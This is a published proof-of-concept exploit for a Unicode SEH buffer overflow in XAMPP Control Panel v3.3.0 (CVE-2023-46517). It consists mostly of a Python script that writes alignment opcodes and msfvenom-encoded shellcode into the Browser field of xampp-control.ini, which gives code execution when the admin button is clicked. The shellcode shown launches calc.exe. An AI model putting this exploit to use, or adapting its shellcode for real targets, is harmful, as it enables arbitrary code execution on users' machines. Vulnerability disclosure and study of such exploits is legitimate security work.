# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH) # Date: 2023-10-26 # Author: Talson (@Ripp3rdoc) # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe # Version: 3.3.0 # Tested on: Windows 11 # CVE-2023-46517 ########################################################## # _________ _______ _ _______ _______ _ # # \__ __/( ___ )( \ ( ____ \( ___ )( ( /| # # ) ( | ( ) || ( | ( \/| ( ) || \ ( | # # | | | (___) || | | (_____ | | | || \ | | # # | | | ___ || | (_____ )| | | || (\ \) | # # | | | ( ) || | ) || | | || | \ | # # | | | ) ( || (____/\/\____) || (___) || ) \ | # # )_( |/ \|(_______/\_______)(_______)|/ )_) # # # ########################################################## # Proof of Concept: # 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini" # 2.- Open the application (xampp-control.exe) # 3.- Click on the "admin" button in front of Apache service. # 4.- Profit # Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/ # Greetingz to EMU TEAM (¬‿¬)⩙ from pwn import * import shutil import os.path buffer = "\x41" * 268 # 268 bytes to fill the buffer nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding) seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ; padd = "\x71" * 0x55 # padding eax_align = "\x47" # venetian pad/align eax_align += "\x51" # push ecx eax_align += "\x71" # venetian pad/align eax_align += "\x58" # pop eax -> eax = 0019e1a0 eax_align += "\x71" # venetian pad/align eax_align += "\x05\x24\x11" # add eax,0x11002300 eax_align += "\x71" # venetian pad/align eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC eax_align += "\x71" # venetian pad/align eax_align += "\x50" # push eax eax_align += "\x71" # pad to align the following ret eax_align += "\xc3"; # ret into eax? # msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin # Payload size: 512 bytes shellcode = ( "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1" "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx" "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk" "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML" "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57" "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA" ) shellcode = buffer + nseh + seh + eax_align + padd + shellcode check_file = os.path.isfile("c:\\xampp\\xampp-control.ini") if check_file: print("[!] Backup file found. Generating the POC file...") pass else: # create backup try: shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak") print("[+] Creating backup for xampp-control.ini...") print("[+] Backup file created!") except Exception as e: print("[!] Failed creating a backup for xampp-control.ini: ", e) try: # Create the new file with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file: file.write(f"""[Common] Edition= Editor= Browser={shellcode} Debug=0 Debuglevel=0 Language=en TomcatVisible=1 Minimized=0 [LogSettings] Font=Arial FontSize=10 [WindowSettings] Left=-1 Top=-1 Width=682 Height=441 [Autostart] Apache=0 MySQL=0 FileZilla=0 Mercury=0 Tomcat=0 [Checks] CheckRuntimes=1 CheckDefaultPorts=1 [ModuleNames] Apache=Apache MySQL=MySQL Mercury=Mercury Tomcat=Tomcat [EnableModules] Apache=1 MySQL=1 FileZilla=1 Mercury=1 Tomcat=1 [EnableServices] Apache=1 MySQL=1 FileZilla=1 Tomcat=1 [BinaryNames] Apache=httpd.exe MySQL=mysqld.exe FileZilla=filezillaserver.exe FileZillaAdmin=filezilla server interface.exe Mercury=mercury.exe Tomcat=tomcat8.exe [ServiceNames] Apache=Apache2.4 MySQL=mysql FileZilla=FileZillaServer Tomcat=Tomcat [ServicePorts] Apache=80 ApacheSSL=443 MySQL=3306 FileZilla=21 FileZill=14147 Mercury1=25 Mercury2=79 Mercury3=105 Mercury4=106 Mercury5=110 Mercury6=143 Mercury7=2224 TomcatHTTP=8080 TomcatAJP=8009 Tomcat=8005 [UserConfigs] Apache= MySQL= FileZilla= Mercury= Tomcat= [UserLogs] Apache= MySQL= FileZilla= Mercury= Tomcat= """) print("[+] Created the POC!") except Exception as e: print("[!] Failed creating the POC xampp-control.ini: ", e)
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |